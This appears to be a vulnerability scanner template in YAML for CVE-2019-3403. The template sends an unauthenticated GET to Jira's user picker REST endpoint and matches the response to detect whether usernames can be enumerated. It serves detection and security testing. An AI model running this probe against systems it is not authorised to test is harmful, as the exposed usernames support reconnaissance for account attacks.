33 lines
866 B
YAML
33 lines
866 B
YAML
id: CVE-2019-3403
|
|
|
|
info:
|
|
name: User enumeration via an incorrect authorisation check
|
|
author: Ganofins
|
|
severity: medium
|
|
description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
|
|
reference: https://jira.atlassian.com/browse/JRASERVER-69242
|
|
tags: cve,cve2019,atlassian,jira
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/rest/api/2/user/picker?query="
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- 'application/json'
|
|
part: header
|
|
|
|
- type: word
|
|
words:
|
|
- users
|
|
- total
|
|
- header
|
|
condition: and |